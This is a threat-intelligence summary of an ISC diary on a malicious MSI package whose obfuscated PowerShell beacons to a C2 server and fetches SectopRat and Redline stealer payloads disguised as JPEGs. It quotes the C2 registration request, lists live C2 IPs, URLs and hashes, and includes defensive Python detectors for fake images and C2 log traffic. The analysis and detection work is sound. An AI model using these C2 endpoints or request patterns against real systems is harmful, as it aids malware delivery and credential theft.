Various Malware Delivered via MSI Package

The article analyzes a potentially malicious MSI package that embeds obfuscated PowerShell code, which attempts to contact a C2 server and download additional payloads disguised as JPEG images. It highlights the risks of MSI files and emphasizes downloading software only from trusted sources. #SectopRat #RedlineStealer #CyanBrain #MSI #PowerShell #C2 #JPEGImage

Keypoints

  • The analyzed file is an MSI package containing obfuscated PowerShell code.
  • Custom actions within the MSI can execute PowerShell scripts that perform malicious activities.
  • The initial PowerShell registers with a C2 server and sends system information.
  • Payloads are downloaded from the C2 server and disguised as JPEG images.
  • The first payload belongs to the SectopRat family, followed by a Redline stealer.
  • Persistence is implemented via scheduled tasks that execute the downloaded malware.
  • The article warns against trusting MSI packages and advises downloading software only from safe sources.
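The payloads above were served with .jpg names but were executables, so a cheap triage check on a downloaded file is to compare what the extension promises with what the leading bytes show. The following is an added example written for this summary, not code from the ISC diary; the sample byte strings are constructed for the demo, and the file names reuse those listed on the page.

```python
"""Flag downloaded files whose extension claims an image but whose bytes do not.

Added example (not code from the ISC diary). Sample bytes are constructed.
"""
from typing import NamedTuple

# Leading bytes of the container formats we care about: JPEG always starts with
# the SOI marker FF D8 FF, PNG with an 8-byte signature, and a Windows
# executable (PE) with the DOS stub signature "MZ".
MAGIC = {
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "pe": (b"MZ",),
}

# Extensions that promise an image; anything else carrying them is suspect.
IMAGE_EXTENSIONS = {".jpg": "jpeg", ".jpeg": "jpeg", ".png": "png"}


class Verdict(NamedTuple):
    claimed: str      # format implied by the file name, or "other"
    actual: str       # format implied by the magic bytes, or "unknown"
    suspicious: bool  # True when the name promises an image the bytes do not deliver


def detect_format(data: bytes) -> str:
    """Return the container format implied by the leading bytes."""
    for fmt, signatures in MAGIC.items():
        if any(data.startswith(sig) for sig in signatures):
            return fmt
    return "unknown"


def classify(filename: str, data: bytes) -> Verdict:
    """Compare what the extension claims with what the bytes show."""
    parts = filename.lower().rsplit(".", 1)
    claimed = IMAGE_EXTENSIONS.get("." + parts[1], "other") if len(parts) == 2 else "other"
    actual = detect_format(data)
    # An image extension over a PE header, or over bytes we cannot identify, is a mismatch.
    suspicious = claimed != "other" and actual != claimed
    return Verdict(claimed, actual, suspicious)


if __name__ == "__main__":
    # Constructed samples: a minimal JPEG header, and a PE-style header saved as .jpg
    samples = {
        "real.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00",
        "bart.jpg": b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff",
    }
    for name, blob in samples.items():
        print(name, classify(name, blob))
```

Treating an unrecognised header under an image extension as suspicious is deliberate: truncated downloads will produce some noise, but it also catches containers that are merely prefixed with junk before the real payload.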

MITRE Techniques

  • [T1071] Command and Control – ‘First, it starts the registration process with the C2:
      GET /?status=reg&key=bart_23rfs&site=Barto_ HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.16299.251
      Host: filemanaager[.]net
      Connection: Keep-Alive’
  • [T1059] Execution – ‘PowerShell scripts are executed to perform malicious actions.’
  • [T1053] Persistence – ‘Scheduled tasks are created to maintain persistence.’
  • [T1001] Data Obfuscation – ‘PowerShell code is heavily obfuscated to evade detection.’
  • [T1003] Credential Access – ‘Redline stealer is used to collect credentials from the victim’s system.’

Indicators of Compromise

  • [File Hash] resources.msi – 69cad2bf6d63dfc93b632cfd91b5182f14b5140da22f9a0ce82c8b459ad76c38
  • [File Hash] SectopRat payload – 7808f3aea222cdbec2e53b126f46195f4523e9501882b94e0cd42e30f8484f32
  • [File Hash] Redline stealer payload – 38c233b38ef1838666ce7204f41349d0ba9431ea4b23fdb05f915cc7a09ff7be
  • [File Name] bart.jpg, Meta.jpg, steam.jpg – first and second payload containers disguised as images
  • [IP] 193.3.19.108 – C2 host used for second-stage payload delivery
  • [IP:Port] 83.97.73.190:4819 – second-stage C2 connection
  • [Domain] filemanaager.net – C2 domain observed in requests
  • [URL] http://213.109.202.229:9000/wbinjget?q=6DDE74FFD397B5FB346F9CA050F6095C – initial C2 GET request for payload
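A defender's first use of the indicators above is to sweep proxy or web-gateway logs for them. The block below is an added example for this summary, not code from the ISC diary: the hosts, path, query keys and the fixed WindowsPowerShell User-Agent come from the write-up, while the log layout ("timestamp client method url status \"user_agent\"") and the log lines themselves are constructed for the demo.

```python
"""Hunt proxy logs for the C2 traffic pattern described in the write-up.

Added example, not part of the ISC diary. Indicators are taken from the page;
the log format and sample lines are constructed (an assumption about layout).
"""
import re
from urllib.parse import urlsplit, parse_qs

# Indicators lifted from the write-up above.
C2_HOSTS = {"filemanaager.net", "193.3.19.108", "213.109.202.229", "83.97.73.190"}
C2_PATHS = {"/wbinjget"}
REGISTRATION_KEYS = {"status", "key", "site"}   # GET /?status=reg&key=...&site=...

# The registration request carried a hard-coded WindowsPowerShell User-Agent.
POWERSHELL_UA = re.compile(r"WindowsPowerShell/\d+\.\d+")

# Hypothetical log layout: ts client method url status "user_agent"
LOG_LINE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) '
    r'(?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)


def reasons_for(url: str, ua: str) -> list[str]:
    """Return every reason a request matches the described C2 traffic."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    query = parse_qs(parts.query)
    reasons = []
    if host in C2_HOSTS:
        reasons.append(f"known C2 host {host}")
    if parts.path in C2_PATHS:
        reasons.append(f"known C2 path {parts.path}")
    if REGISTRATION_KEYS.issubset(query) and query.get("status") == ["reg"]:
        reasons.append("registration beacon (status=reg)")
    # PowerShell fetching a .jpg straight from a bare IP host matches the
    # disguised-payload download pattern, independent of the specific IPs.
    if (POWERSHELL_UA.search(ua) and parts.path.lower().endswith(".jpg")
            and re.fullmatch(r"\d+(\.\d+){3}", host)):
        reasons.append("PowerShell downloading .jpg from bare IP")
    return reasons


def hunt(lines) -> list[dict]:
    """Parse each log line and keep those with at least one matching reason."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue
        why = reasons_for(m["url"], m["ua"])
        if why:
            hits.append({"client": m["client"], "url": m["url"], "reasons": why})
    return hits


# Constructed sample log: three requests mirroring the write-up, one benign.
SAMPLE_LOG = """\
2024-08-01T10:00:01Z 10.0.0.5 GET http://filemanaager.net/?status=reg&key=bart_23rfs&site=Barto_ 200 "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.16299.251"
2024-08-01T10:00:02Z 10.0.0.5 GET http://213.109.202.229:9000/wbinjget?q=6DDE74FFD397B5FB346F9CA050F6095C 200 "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.16299.251"
2024-08-01T10:00:03Z 10.0.0.5 GET http://193.3.19.108/bart.jpg 200 "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.16299.251"
2024-08-01T10:00:04Z 10.0.0.7 GET https://example.com/images/logo.jpg 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"
"""

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG.splitlines()):
        print(hit["client"], hit["url"], "->", "; ".join(hit["reasons"]))
```

The last rule in `reasons_for` is the one worth keeping after the listed IPs go stale: a PowerShell User-Agent pulling an image file from a bare IP address is the behavioural shape of the download stage, not a specific indicator.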

Read more: https://isc.sans.edu/diary/rss/31168